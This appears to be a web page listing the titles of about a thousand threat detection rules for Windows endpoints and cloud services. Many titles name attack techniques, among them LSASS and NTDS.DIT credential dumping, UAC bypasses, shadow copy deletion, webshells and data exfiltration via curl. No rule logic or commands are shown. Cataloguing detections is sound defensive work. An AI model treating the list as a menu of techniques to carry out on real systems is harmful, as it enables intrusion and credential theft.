  • LSASS Dump Keyword In CommandLine
  • Potential File Download Via MS-AppInstaller Protocol Handler
  • Suspicious Network Command
  • Suspicious Scan Loop Network
  • Potential Network Sniffing Activity Using Network Tools
  • Execution of Suspicious File Type Extension
  • Non-privileged Usage of Reg or Powershell
  • Process Launched Without Image Name
  • Suspicious Process Patterns NTDS.DIT Exfil
  • Potentially Suspicious Call To Win32_NTEventlogFile Class
  • Use Short Name Path in Command Line
  • Use Short Name Path in Image
  • Use NTFS Short Name in Command Line
  • Use NTFS Short Name in Image
  • Obfuscated IP Download Activity
  • Obfuscated IP Via CLI
  • Suspicious Process Parents
  • Private Keys Reconnaissance Via CommandLine Tools
  • Potential PowerShell Execution Via DLL
  • Suspicious RunAs-Like Flag Combination
  • Privilege Escalation via Named Pipe Impersonation
  • Windows Processes Suspicious Parent Directory
  • Suspicious Program Names
  • Recon Information for Export with Command Prompt
  • Suspicious Process Execution From Fake Recycle.Bin Folder
  • Suspicious Redirection to Local Admin Share
  • Potential Remote Desktop Tunneling
  • Potential Defense Evasion Via Right-to-Left Override
  • Script Interpreter Execution From Suspicious Folder
  • Suspicious Script Execution From Temp Folder
  • Sensitive File Access Via Volume Shadow Copy Backup
  • Suspicious New Service Creation
  • Suspicious Service Binary Directory
  • Shadow Copies Creation Using Operating Systems Utilities
  • Suspicious Windows Service Tampering
  • System File Execution Location Anomaly
  • Shadow Copies Deletion Using Operating Systems Utilities
  • Windows Shell/Scripting Processes Spawning Suspicious Programs
  • Suspicious SYSTEM User Process Creation
  • Suspicious SYSVOL Domain Group Policy Access
  • Tasks Folder Evasion
  • Process Creation Using Sysnative Folder
  • Suspicious Userinit Child Process
  • Malicious Windows Script Components File Execution by TAEF Detection
  • Malicious PE Execution by Microsoft Visual Studio Debugger
  • Weak or Abused Passwords In CLI
  • Usage Of Web Request Commands And Cmdlets
  • WhoAmI as Parameter
  • Execution via WorkFolders.exe
  • Suspect Svchost Activity
  • Suspicious Process Masquerading As SvcHost.EXE
  • Terminal Service Process Spawn
  • Uncommon Svchost Parent Process
  • Permission Check Via Accesschk.EXE
  • Active Directory Database Snapshot Via ADExplorer
  • Suspicious Active Directory Database Snapshot Via ADExplorer
  • Potential Execution of Sysinternals Tools
  • Potential Memory Dumping Activity Via LiveKD
  • Kernel Memory Dump Via LiveKD
  • Procdump Execution
  • Potential SysInternals ProcDump Evasion
  • Potential LSASS Process Dump Via Procdump
  • Psexec Execution
  • PsExec/PAExec Escalation to LOCAL SYSTEM
  • Potential PsExec Remote Execution
  • PsExec Service Child Process Execution as LOCAL SYSTEM
  • PsExec Service Execution
  • Suspicious Use of PsLogList
  • Sysinternals PsService Execution
  • Sysinternals PsSuspend Execution
  • Sysinternals PsSuspend Suspicious Execution
  • Potential File Overwrite Via Sysinternals SDelete
  • Potential Privilege Escalation To LOCAL SYSTEM
  • Sysmon Configuration Update
  • Uninstall Sysinternals Sysmon
  • Potential Binary Impersonating Sysinternals Tools
  • Sysprep on AppData Folder
  • Suspicious Execution of Systeminfo
  • Potential Signing Bypass Via Windows Developer Features
  • Suspicious Recursive Takeown
  • Tap Installer Execution
  • Compressed File Creation Via Tar.EXE
  • Compressed File Extraction Via Tar.EXE
  • Taskkill Symantec Endpoint Protection
  • Loaded Module Enumeration Via Tasklist.EXE
  • Taskmgr as LOCAL_SYSTEM
  • New Process Created Via Taskmgr.EXE
  • Potentially Suspicious Command Targeting Teams Sensitive Files
  • Suspicious TSCON Start as SYSTEM
  • New Virtual Smart Card Created Via TpmVscMgr.EXE
  • Bypass UAC via CMSTP
  • Suspicious RDP Redirect Using TSCON
  • UAC Bypass Using Disk Cleanup
  • UAC Bypass Using ChangePK and SLUI
  • CMSTP UAC Bypass via COM Object Access
  • UAC Bypass Tools Using ComputerDefaults
  • Potential RDP Session Hijacking Activity
  • UAC Bypass Using Consent and Comctl32 - Process
  • UAC Bypass Using DismHost
  • Bypass UAC via Fodhelper.exe
  • UAC Bypass Using Event Viewer RecentViews
  • UAC Bypass Using NTFS Reparse Point - Process
  • UAC Bypass via ICMLuaUtil
  • UAC Bypass Using IDiagnostic Profile
  • UAC Bypass Using IEInstal - Process
  • UAC Bypass via Windows Firewall Snap-In Hijack
  • UAC Bypass Using MSConfig Token Modification - Process
  • UAC Bypass Using PkgMgr and DISM
  • Potential UAC Bypass Via Sdclt.EXE
  • TrustedPath UAC Bypass Pattern
  • UAC Bypass Abusing Winsat Path Parsing - Process
  • UAC Bypass Using Windows Media Player - Process
  • Bypass UAC via WSReset.exe
  • UAC Bypass WSReset
  • Use of UltraVNC Remote Access Software
  • Suspicious UltraVNC Execution
  • Uninstall Crowdstrike Falcon Sensor
  • Windows Credential Manager Access via VaultCmd
  • Uncommon Userinit Child Process
  • Verclsid.exe Runs COM Object
  • Detect Virtualbox Driver Installation OR Starting Of VMs
  • Suspicious VBoxDrvInst.exe Parameters
  • Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script
  • VMToolsd Suspicious Child Process
  • Potentially Suspicious Child Process Of VsCode
  • Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Shell Execution
  • Renamed Visual Studio Code Tunnel Execution
  • Visual Studio Code Tunnel Service Installation
  • Potential Binary Proxy Execution Via VSDiagnostics.EXE
  • Suspicious Vsls-Agent Command With AgentExtensionPath Load
  • Use of W32tm as Timer
  • Wab Execution From Non Default Location
  • Wab/Wabmig Unusual Parent Or Child Processes
  • All Backups Deleted Via Wbadmin.EXE
  • Windows Backup Deleted Via Wbadmin.EXE
  • Sensitive File Dump Via Wbadmin.EXE
  • File Recovery From Backup Via Wbadmin.EXE
  • Sensitive File Recovery From Backup Via Wbadmin.EXE
  • Potentially Suspicious WebDAV LNK Execution
  • Chopper Webshell Process Pattern
  • Webshell Hacking Activity Patterns
  • Webshell Detection With Command Line Keywords
  • Suspicious Process By Web Server Process
  • Potential Credential Dumping Via WER
  • Webshell Tool Reconnaissance Activity
  • Potential ReflectDebugger Content Execution Via WerFault.EXE
  • Suspicious Child Process Of Wermgr.EXE
  • Suspicious Execution Location Of Wermgr.EXE
  • Suspicious File Download From IP Via Wget.EXE
  • Suspicious File Download From File Sharing Domain Via Wget.EXE
  • Suspicious File Download From IP Via Wget.EXE - Paths
  • Suspicious Where Execution
  • Enumerate All Information With Whoami.EXE
  • Whoami Utility Execution
  • Whoami.EXE Execution From Privileged Process
  • Group Membership Reconnaissance Via Whoami.EXE
  • Whoami.EXE Execution With Output Option
  • Whoami.EXE Execution Anomaly
  • Security Privileges Enumeration Via Whoami.EXE
  • Suspicious WindowsTerminal Child Processes
  • Add New Download Source To Winget
  • Add Insecure Download Source To Winget
  • Add Potential Suspicious New Download Source To Winget
  • Install New Package Via Winget Local Manifest
  • Winrar Compressing Dump Files
  • Potentially Suspicious Child Process Of WinRAR.EXE
  • Winrar Execution in Non-Standard Folder
  • AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl
  • Remote Code Execute via Winrm.vbs
  • Remote PowerShell Session Host Process (WinRM)
  • Suspicious Processes Spawned by WinRM
  • Compress Data and Lock With Password for Exfiltration With WINZIP
  • Wlrmdr.EXE Uncommon Argument Or Child Process
  • New ActiveScriptEventConsumer Created Via Wmic.EXE
  • Potential Windows Defender Tampering Via Wmic.EXE
  • New Process Created Via Wmic.EXE
  • Computer System Reconnaissance Via Wmic.EXE
  • Local Groups Reconnaissance Via Wmic.EXE
  • Hardware Model Reconnaissance Via Wmic.EXE
  • Windows Hotfix Updates Reconnaissance Via Wmic.EXE
  • Process Reconnaissance Via Wmic.EXE
  • Potential Product Reconnaissance Via Wmic.EXE
  • Potential Product Class Reconnaissance Via Wmic.EXE
  • Service Reconnaissance Via Wmic.EXE
  • Uncommon System Information Discovery Via Wmic.EXE
  • Potential Unquoted Service Path Reconnaissance Via Wmic.EXE
  • System Disk And Volume Reconnaissance Via Wmic.EXE
  • WMIC Remote Command Execution
  • Service Started/Stopped Via Wmic.EXE
  • Potential SquiblyTwo Technique Execution
  • Suspicious WMIC Execution Via Office Process
  • Suspicious Process Created Via Wmic.EXE
  • Application Terminated Via Wmic.EXE
  • Application Removed Via Wmic.EXE
  • Potential Tampering With Security Products Via WMIC
  • XSL Script Execution Via WMIC.EXE
  • WmiPrvSE Spawned A Process
  • Potential WMI Lateral Movement WmiPrvSE Spawned PowerShell
  • Suspicious WmiPrvSE Child Process
  • WMI Backdoor Exchange Transport Agent
  • WMI Persistence - Script Event Consumer
  • UEFI Persistence Via Wpbbin - ProcessCreation
  • Potential Dropper Script Execution Via WScript/CScript
  • Cscript/Wscript Potentially Suspicious Child Process
  • Cscript/Wscript Uncommon Script Extension Execution
  • WSL Child Process Anomaly
  • Windows Binary Executed From WSL
  • Proxy Execution Via Wuauclt.EXE
  • Suspicious Windows Update Agent Empty Cmdline
  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths
  • Wusa.EXE Executed By Parent Process Located In Suspicious Location
  • Xwizard.EXE Execution From Non-Default Location
  • COM Object Execution via Xwizard.EXE
  • ZxShell Malware
  • Turla Group Lateral Movement
  • Turla Group Commands May 2020
  • Exploit for CVE-2015-1641
  • Exploit for CVE-2017-0261
  • Droppers Exploiting CVE-2017-11882
  • Exploit for CVE-2017-8759
  • Adwind RAT / JRAT
  • Fireball Archer Install
  • NotPetya Ransomware Activity
  • Potential PlugX Activity
  • WannaCry Ransomware Activity
  • Potential APT10 Cloud Hopper Activity
  • Ps.exe Renamed SysInternals Tool
  • Lazarus System Binary Masquerading
  • Elise Backdoor Activity
  • APT27 - Emissary Panda Activity
  • Sofacy Trojan Loader Activity
  • APT29 2018 Phishing Campaign CommandLine Indicators
  • Potential MuddyWater APT Activity
  • OilRig APT Activity
  • Defrag Deactivation
  • TropicTrooper Campaign November 2018
  • Potential BearLPE Exploitation
  • Exploiting SetupComplete.cmd CVE-2019-1378
  • Exploiting CVE-2019-1388
  • Potential Baby Shark Malware Activity
  • Potential Dridex Activity
  • Potential Dtrack RAT Activity
  • Potential Emotet Activity
  • Formbook Process Creation
  • LockerGoga Ransomware Activity
  • Potential QBot Activity
  • Potential Ryuk Ransomware Activity
  • Potential Snatch Ransomware Activity
  • Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32
  • APT31 Judgement Panda Activity
  • Potential Russian APT Credential Theft Activity
  • Potential EmpireMonkey Activity
  • Equation Group DLL_U Export Function Load
  • Mustang Panda Dropper
  • Operation Wocao Activity
  • DNS RCE CVE-2020-1350
  • Potential Emotet Rundll32 Execution
  • Exploitation Attempt Of CVE-2020-1472 - Execution of ZeroLogon PoC
  • Suspicious PrinterPorts Creation (CVE-2020-1048)
  • Exploited CVE-2020-10189 Zoho ManageEngine
  • Blue Mockingbird
  • GALLIUM IOCs
  • Potential Maze Ransomware Activity
  • Trickbot Malware Activity
  • Potential Ke3chang/TidePool Malware Activity
  • EvilNum APT Golden Chickens Deployment Via OCX Files
  • Lazarus Group Activity
  • UNC2452 Process Creation Patterns
  • Greenbug Espionage Group Indicators
  • UNC2452 PowerShell Pattern
  • Suspicious VBScript UN2452 Pattern
  • TAIDOOR RAT DLL Load
  • Winnti Malware HK University Campaign
  • Winnti Pipemon Characteristics
  • Potential Atlassian Confluence CVE-2021-26084 Exploitation Attempt
  • Potential CVE-2021-26857 Exploitation Attempt
  • Serv-U Exploitation CVE-2021-35211 by DEV-0322
  • Potential CVE-2021-40444 Exploitation Attempt
  • Potential Exploitation Attempt From Office Application
  • Potential CVE-2021-41379 Exploitation Attempt
  • Potential CVE-2021-44228 Exploitation Attempt - VMware Horizon
  • Suspicious RazerInstaller Explorer Subprocess
  • Potential SystemNightmare Exploitation Attempt
  • Potential BlackByte Ransomware Activity
  • Conti Volume Shadow Listing
  • Conti NTDS Exfiltration Command
  • Potential Conti Ransomware Activity
  • Potential Conti Ransomware Database Dumping Activity Via SQLCmd
  • DarkSide Ransomware Pattern
  • Potential Devil Bait Malware Reconnaissance
  • Potential Goofy Guineapig Backdoor Activity
  • Potential Goofy Guineapig GoolgeUpdate Process Anomaly
  • Pingback Backdoor Activity
  • Small Sieve Malware CommandLine Indicator
  • HAFNIUM Exchange Exploitation Activity
  • REvil Kaseya Incident Malware Patterns
  • SOURGUM Actor Behaviours
  • Potential CVE-2023-21554 QueueJumper Exploitation
  • Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution
  • Potential CVE-2022-26809 Exploitation Attempt
  • Potential CVE-2022-29072 Exploitation Attempt
  • Suspicious Sysmon as Execution Parent
  • ChromeLoader Malware Execution
  • Emotet Loader Execution Via .LNK File
  • Hermetic Wiper TG Process Patterns
  • Raspberry Robin Subsequent Execution of Commands
  • Raspberry Robin Initial Execution From External Drive
  • Serpent Backdoor Payload Execution Via Scheduled Task
  • Potential Raspberry Robin Dot Ending File
  • Potential ACTINIUM Persistence Activity
  • FakeUpdates/SocGholish Activity
  • MERCURY APT Activity
  • CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows)
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE
  • Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution
  • CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process
  • Potential Exploitation Attempt Of Undocumented WindowsServer RCE
  • COLDSTEEL RAT Anonymous User Process Execution
  • COLDSTEEL RAT Cleanup Command Execution
  • COLDSTEEL RAT Service Persistence Execution
  • DarkGate - Autoit3.EXE Execution Parameters
  • DarkGate - User Created Via Net.EXE
  • Griffon Malware Attack Pattern
  • Injected Browser Process Spawning Rundll32 - GuLoader Activity
  • IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32
  • Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
  • Potential Pikabot Discovery Activity
  • Potential Pikabot Hollowing Activity
  • Pikabot Fake DLL Extension Execution Via Rundll32.EXE
  • Qakbot Regsvr32 Calc Pattern
  • Potential Qakbot Rundll32 Execution
  • Qakbot Rundll32 Exports Execution
  • Qakbot Rundll32 Fake DLL Extension Execution
  • Qakbot Uninstaller Execution
  • Rhadamanthys Stealer Module Launch Via Rundll32.EXE
  • Rorschach Ransomware Execution Activity
  • Potential SNAKE Malware Installation CLI Arguments Indicator
  • Potential SNAKE Malware Installation Binary Indicator
  • Potential SNAKE Malware Persistence Service Execution
  • Ursnif Redirection Of Discovery Commands
  • Potential Compromised 3CXDesktopApp Execution
  • Potential Suspicious Child Process Of 3CXDesktopApp
  • Potential Compromised 3CXDesktopApp Update Activity
  • Diamond Sleet APT Process Activity Indicators
  • Potential APT FIN7 Reconnaissance/POWERTRASH Related Activity
  • Lace Tempest Cobalt Strike Download
  • Lace Tempest Malware Loader Execution
  • Mint Sandstorm - AsperaFaspex Suspicious Process Execution
  • Mint Sandstorm - Log4J Wstomcat Process Execution
  • Mint Sandstorm - ManageEngine Suspicious Process Execution
  • Potential APT Mustang Panda Activity Against Australian Gov
  • PaperCut MF/NG Exploitation Related Indicators
  • PaperCut MF/NG Potential Exploitation
  • Peach Sandstorm APT Process Activity Indicators
  • Potential Exploitation of CVE-2024-37085 - Suspicious Creation Of ESX Admins Group
  • CVE-2024-50623 Exploitation Attempt - Cleo
  • Potential KamiKakaBot Activity - Lure Document Execution
  • Potential KamiKakaBot Activity - Shutdown Schedule Task Creation
  • Kapeka Backdoor Persistence Activity
  • Kapeka Backdoor Execution Via RunDLL32.EXE
  • Lummac Stealer Activity - Execution Of More.com And Vbc.exe
  • Potential Raspberry Robin CPL Execution Activity
  • Potential APT FIN7 Exploitation Activity
  • Forest Blizzard APT - Process Creation Activity
  • Userdomain Variable Enumeration
  • Password Protected Compressed File Extraction Via 7Zip
  • Set Files as System Files Using Attrib.EXE
  • Potential BOINC Software Execution (UC-Berkeley Signature)
  • CMD Shell Output Redirect
  • Potential File Override/Append Via SET Command
  • Headless Process Launched Via Conhost.EXE
  • Dynamic .NET Compilation Via Csc.EXE - Hunting
  • File Download Via Curl.EXE
  • Curl.EXE Execution
  • Potential Data Exfiltration Via Curl.EXE
  • Diskshadow Child Process Spawned
  • Curl.EXE Execution With Custom UserAgent
  • ClickOnce Deployment Execution - Dfsvc.EXE Child Process
  • Diskshadow Script Mode Execution
  • Potential Proxy Execution Via Explorer.EXE From Shell Process
  • Potential DLL Sideloading Activity Via ExtExport.EXE
  • Potential Password Reconnaissance Via Findstr.EXE
  • New Self Extracting Package Created Via IExpress.EXE
  • Microsoft Workflow Compiler Execution
  • CodePage Modification Via MODE.COM
  • Net.EXE Execution
  • SMB over QUIC Via Net.EXE
  • Suspicious New Instance Of An Office COM Object
  • Import New Module Via PowerShell CommandLine
  • Unusually Long PowerShell CommandLine
  • Invocation Of Crypto-Classes From The "Cryptography" PowerShell Namespace
  • New Windows Firewall Rule Added Via New-NetFirewallRule Cmdlet
  • Potentially Suspicious PowerShell Child Processes
  • Regsvr32.EXE Calling of DllRegisterServer Export Function Implicitly
  • Remote Access Tool - Action1 Arbitrary Code Execution and Remote Sessions
  • Remote Access Tool - Ammy Admin Agent Execution
  • Remote Access Tool - Cmd.EXE Execution via AnyViewer
  • Remote Access Tool - ScreenConnect Remote Command Execution - Hunting
  • DLL Call by Ordinal Via Rundll32.EXE
  • Rundll32.EXE Calling DllRegisterServer Export Function Explicitly
  • Scheduled Task Creation From Potential Suspicious Parent Location
  • SC.EXE Query Execution
  • Potential CommandLine Obfuscation Using Unicode Characters
  • Potentially Suspicious Compression Tool Parameters
  • Elevated System Shell Spawned
  • EventLog Query Requests By Builtin Utilities
  • Potential Suspicious Execution From GUID Like Folder Names
  • Execution From Webserver Root Folder
  • Tunneling Tool Execution
  • File or Folder Permissions Modifications
  • Manual Execution of Script Inside of a Compressed File
  • Process Terminated Via Taskkill
  • Suspicious Tasklist Discovery Command
  • System Information Discovery Via Wmic.EXE
  • WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
  • Arbitrary Command Execution Using WSL
  • Cab File Extraction Via Wusa.EXE
  • Silence.Downloader V3
  • Automated Turla Group Lateral Movement
  • DNSCat2 Powershell Implementation Detection Via Process Creation
  • Reconnaissance Activity Using BuiltIn Commands
  • Quick Execution of a Series of Suspicious Commands
  • MSI Spawned Cmd and Powershell Spawned Processes
  • Always Install Elevated Parent Child Correlated
  • Windows Kernel and 3rd-Party Drivers Exploits Token Stealing
  • Detection of Possible Rotten Potato
None 1002
Show Rules (1002)
  • App Permissions Granted For Other APIs
  • Edit of .bash_profile and .bashrc
  • OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd
  • Brute Force
  • Domestic Kitten FurBall Malware Pattern
  • CobaltStrike Malleable Amazon Browsing Traffic Profile
  • CobaltStrike Malformed UAs in Malleable Profiles
  • CobaltStrike Malleable (OCSP) Profile
  • CobaltStrike Malleable OneDrive Browsing Traffic Profile
  • iOS Implant URL Pattern
  • Search-ms and WebDAV Suspicious Indicators in URL
  • Suspicious PowerShell Download
  • Suspicious PowerShell Invocations - Generic
  • Suspicious PowerShell Invocations - Specific
  • SyncAppvPublishingServer Execution to Bypass Powershell Restriction
  • Accessing WinAPI in PowerShell for Credentials Dumping
  • DCOM InternetExplorer.Application Iertutil DLL Hijack - Sysmon
  • Windows Defender Threat Detection Disabled
  • Lateral Movement Indicator ConDrv
  • Security Event Log Cleared
  • Group Modification Logging
  • Correct Execution of Nltest.exe
  • New Service Uses Double Ampersand in Path
  • SAM Dump to AppData
  • Kubernetes CronJob/Job Modification
  • Kubernetes Admission Controller Modification
  • Kubernetes Rolebinding Modification
  • Kubernetes Secrets Modified or Deleted
  • Kubernetes Unauthorized or Unauthenticated Access
  • Antivirus Exploitation Framework Detection
  • Antivirus Hacktool Detection
  • Antivirus Password Dumper Detection
  • Antivirus Ransomware Detection
  • Antivirus Web Shell Detection
  • Antivirus Relevant File Paths Alerts
  • Suspicious SQL Query
  • AWS Attached Malicious Lambda Layer
  • AWS CloudTrail Important Change
  • Malicious Usage Of IMDS Credentials Outside Of AWS Infrastructure
  • New Network ACL Entry Added
  • New Network Route Added
  • Ingress/Egress Security Group Modification
  • LoadBalancer Security Group Modification
  • RDS Database Security Group Modification
  • Potential Malicious Usage of CloudTrail System Manager
  • AWS Config Disabling Channel/Recorder
  • AWS Console GetSigninToken Potential Abuse
  • SES Identity Has Been Deleted
  • AWS SAML Provider Deletion Activity
  • AWS S3 Bucket Versioning Disable
  • AWS Key Pair Import Activity
  • AWS EC2 Disable EBS Encryption
  • AWS EC2 Startup Shell Script Change
  • AWS EC2 VM Export Failure
  • AWS ECS Task Definition That Queries The Credential Endpoint
  • AWS EFS Fileshare Modified or Deleted
  • AWS EFS Fileshare Mount Modified or Deleted
  • AWS EKS Cluster Created or Deleted
  • AWS ElastiCache Security Group Created
  • AWS ElastiCache Security Group Modified or Deleted
  • Potential Bucket Enumeration on AWS
  • AWS GuardDuty Important Change
  • AWS IAM Backdoor Users Keys
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation
  • AWS IAM S3Browser LoginProfile Creation
  • AWS IAM S3Browser User or AccessKey Creation
  • New AWS Lambda Function URL Configuration Created
  • AWS Glue Development Endpoint Activity
  • AWS RDS Master Password Change
  • Modification or Deletion of an AWS RDS Cluster
  • Restore Public AWS RDS Instance
  • AWS Root Credentials
  • AWS Route 53 Domain Transfer Lock Disabled
  • AWS Route 53 Domain Transferred to Another Account
  • AWS S3 Data Management Tampering
  • AWS SecurityHub Findings Evasion
  • AWS Snapshot Backup Exfiltration
  • AWS Identity Center Identity Provider Change
  • AWS STS AssumeRole Misuse
  • AWS STS GetSessionToken Misuse
  • AWS Suspicious SAML Activity
  • AWS User Login Profile Was Modified
  • Azure Active Directory Hybrid Health AD FS New Server
  • Azure Active Directory Hybrid Health AD FS Service Delete
  • User Added to an Administrator's Azure AD Role
  • Azure Application Deleted
  • Azure Application Gateway Modified or Deleted
  • Azure Application Security Group Modified or Deleted
  • Azure Application Credential Modified
  • Azure Container Registry Created or Deleted
  • Number Of Resource Creation Or Deployment Activities
  • Azure Device No Longer Managed or Compliant
  • Azure Device or Configuration Modified or Deleted
  • Azure DNS Zone Modified or Deleted
  • Azure Firewall Modified or Deleted
  • Azure Firewall Rule Collection Modified or Deleted
  • Granting Of Permissions To An Account
  • Azure Keyvault Key Modified or Deleted
  • Azure Key Vault Modified or Deleted
  • Azure Keyvault Secrets Modified or Deleted
  • Azure Kubernetes Admission Controller
  • Azure Kubernetes Cluster Created or Deleted
  • Azure Kubernetes CronJob
  • Azure Kubernetes Events Deleted
  • Azure Kubernetes Network Policy Change
  • Azure Kubernetes Pods Deleted
  • Azure Kubernetes RoleBinding/ClusterRoleBinding Modified and Deleted
  • Azure Kubernetes Sensitive Role Access
  • Azure Kubernetes Secret or Config Object Access
  • Azure Kubernetes Service Account Modified or Deleted
  • Disabled MFA to Bypass Authentication Mechanisms
  • Azure Network Firewall Policy Modified or Deleted
  • Azure Point-to-site VPN Modified or Deleted
  • Azure Firewall Rule Configuration Modified or Deleted
  • Azure Network Security Configuration Modified or Deleted
  • Azure Virtual Network Device Modified or Deleted
  • Azure New CloudShell Created
  • Azure Owner Removed From Application or Service Principal
  • Rare Subscription-level Operations In Azure
  • Azure Service Principal Created
  • Azure Service Principal Removed
  • Azure Subscription Permission Elevation Via ActivityLogs
  • Azure Suppression Rule Created
  • Azure Virtual Network Modified or Deleted
  • Azure VPN Connection Modified or Deleted
  • CA Policy Removed by Non Approved Actor
  • CA Policy Updated by Non Approved Actor
  • New CA Policy by Non-approved Actor
  • Bitlocker Key Retrieval
  • Account Created And Deleted Within A Close Time Frame
  • Certificate-Based Authentication Enabled
  • Changes to Device Registration Policy
  • Guest Users Invited To Tenant By Non Approved Inviters
  • New Root Certificate Authority Added
  • Users Added to Global or Device Admin Roles
  • Application AppID Uri Configuration Changes
  • Added Credentials to Existing Application
  • Delegated Permissions Granted For All Users
  • End User Consent
  • End User Consent Blocked
  • Added Owner To Application
  • App Granted Microsoft Permissions
  • App Granted Privileged Delegated Or App Permissions
  • App Assigned To Azure RBAC/Microsoft Entra Role
  • Application URI Configuration Changes
  • Windows LAPS Credential Dump From Entra ID
  • Change to Authentication Method
  • Azure Domain Federation Settings Modified
  • User Added To Group With CA Policy Modification Access
  • User Removed From Group With CA Policy Modification Access
  • Guest User Invited By Non Approved Inviters
  • User State Changed From Guest To Member
  • PIM Approvals And Deny Elevation
  • PIM Alert Setting Changes To Disabled
  • Changes To PIM Settings
  • User Added To Privilege Role
  • Bulk Deletion Changes To Privileged Account Permissions
  • Privileged Account Creation
  • Azure Subscription Permission Elevation Via AuditLogs
  • Temporary Access Pass Added To An Account
  • User Risk and MFA Registration Policy Updated
  • Multi Factor Authentication Disabled For User Account
  • Password Reset By User Account
  • Anomalous Token
  • Anomalous User Activity
  • Activity From Anonymous IP Address
  • Anonymous IP Address
  • Atypical Travel
  • Impossible Travel
  • Suspicious Inbox Forwarding Identity Protection
  • Suspicious Inbox Manipulation Rules
  • Azure AD Account Credential Leaked
  • Malicious IP Address Sign-In Failure Rate
  • Malicious IP Address Sign-In Suspicious
  • Sign-In From Malware Infected IP
  • Password Spray Activity
  • Primary Refresh Token Access Attempt
  • Suspicious Browser Activity
  • Azure AD Threat Intelligence
  • SAML Token Issuer Anomaly
  • New Country
  • Unfamiliar Sign-In Properties
  • Stale Accounts In A Privileged Role
  • Invalid PIM License
  • Roles Assigned Outside PIM
  • Roles Activation Doesn't Require MFA
  • Roles Activated Too Frequently
  • Roles Are Not Being Used
  • Too Many Global Admins
  • Account Lockout
  • Successful Authentications From Countries You Do Not Operate Out Of
  • Increased Failed Authentications Of Any Type
  • Measurable Increase Of Successful Authentications
  • Authentications To Important Apps Using Single Factor Authentication
  • Discovery Using AzureHound
  • Failed Authentications From Countries You Do Not Operate Out Of
  • Device Registration or Join Without MFA
  • Azure AD Only Single Factor Authentication Required
  • Suspicious SignIns From A Non Registered Device
  • Sign-ins from Non-Compliant Devices
  • Sign-ins by Unknown Devices
  • Potential MFA Bypass Using Legacy Client Authentication
  • Application Using Device Code Authentication Flow
  • Applications That Are Using ROPC Authentication Flow
  • Account Disabled or Blocked for Sign in Attempts
  • Sign-in Failure Due to Conditional Access Requirements Not Met
  • Use of Legacy Authentication Protocols
  • Login to Disabled Account
  • Multifactor Authentication Denied
  • Azure Unusual Authentication Interruption
  • Multifactor Authentication Interrupted
  • Users Authenticating To Other Azure AD Tenants
  • User Access Blocked by Azure Conditional Access
  • Bitbucket Full Data Export Triggered
  • Bitbucket Global Permission Changed
  • Bitbucket Global Secret Scanning Rule Deleted
  • Bitbucket Global SSH Settings Changed
  • Bitbucket Audit Log Configuration Updated
  • Bitbucket Project Secret Scanning Allowlist Added
  • Bitbucket Secret Scanning Exempt Repository Added
  • Bitbucket Secret Scanning Rule Deleted
  • Bitbucket Unauthorized Access To A Resource
  • Bitbucket Unauthorized Full Data Export Triggered
  • Bitbucket User Details Export Attempt Detected
  • Bitbucket User Login Failure
  • Bitbucket User Login Failure Via SSH
  • Bitbucket User Permissions Export Attempt
  • Cisco Duo Successful MFA Authentication Via Bypass Code
  • GCP Access Policy Deleted
  • GCP Break-glass Container Workload Deployed
  • Google Cloud Storage Buckets Enumeration
  • Google Cloud Storage Buckets Modified or Deleted
  • Google Cloud Re-identifies Sensitive Information
  • Google Cloud DNS Zone Modified or Deleted
  • Google Cloud Firewall Modified or Deleted
  • Google Full Network Traffic Packet Capture
  • Google Cloud Kubernetes Admission Controller
  • Google Cloud Kubernetes CronJob
  • Google Cloud Kubernetes RoleBinding
  • Google Cloud Kubernetes Secrets Modified or Deleted
  • Google Cloud Service Account Disabled or Deleted
  • Google Cloud Service Account Modified
  • Google Cloud SQL Database Modified or Deleted
  • Google Cloud VPN Tunnel Modified or Deleted
  • Google Workspace Application Access Level Modified
  • Google Workspace Application Removed
  • Google Workspace Granted Domain API Access
  • Google Workspace MFA Disabled
  • Google Workspace Role Modified or Deleted
  • Google Workspace Role Privilege Deleted
  • Google Workspace User Granted Admin Privileges
  • Github Delete Action Invoked
  • Outdated Dependency Or Vulnerability Alert Disabled
  • Github High Risk Configuration Disabled
  • Github Fork Private Repositories Setting Enabled/Cleared
  • New Github Organization Member Added
  • Github New Secret Created
  • Github Outside Collaborator Detected
  • Github Push Protection Bypass Detected
  • Github Push Protection Disabled
  • Github Repository/Organization Transferred
  • Github Secret Scanning Feature Disabled
  • Github Self Hosted Runner Changes Detected
  • Github SSH Certificate Configuration Changed
  • Azure Login Bypassing Conditional Access Policies
  • Disabling Multi Factor Authentication
  • New Federated Domain Added
  • New Federated Domain Added - Exchange
  • Activity from Suspicious IP Addresses
  • Activity Performed by Terminated User
  • Activity from Anonymous IP Addresses
  • Data Exfiltration to Unsanctioned Apps
  • Activity from Infrequent Country
  • Microsoft 365 - Impossible Travel Activity
  • Logon from a Risky IP Address
  • Microsoft 365 - Potential Ransomware Activity
  • PST Export Alert Using eDiscovery Alert
  • PST Export Alert Using New-ComplianceSearchAction
  • Suspicious Inbox Forwarding
  • Suspicious OAuth App File Download Activities
  • Microsoft 365 - Unusual Volume of File Deletion
  • Microsoft 365 - User Restricted from Sending Email
  • Okta Admin Functions Access Through Proxy
  • Okta Admin Role Assigned to an User or Group
  • Okta Admin Role Assignment Created
  • Okta API Token Created
  • Okta API Token Revoked
  • Okta Application Modified or Deleted
  • Okta Application Sign-On Policy Modified or Deleted
  • Okta FastPass Phishing Detection
  • Okta Identity Provider Created
  • Okta Network Zone Deactivated or Deleted
  • Okta MFA Reset or Deactivated
  • Okta New Admin Console Behaviours
  • Potential Okta Password in AlternateID Field
  • Okta Policy Rule Modified or Deleted
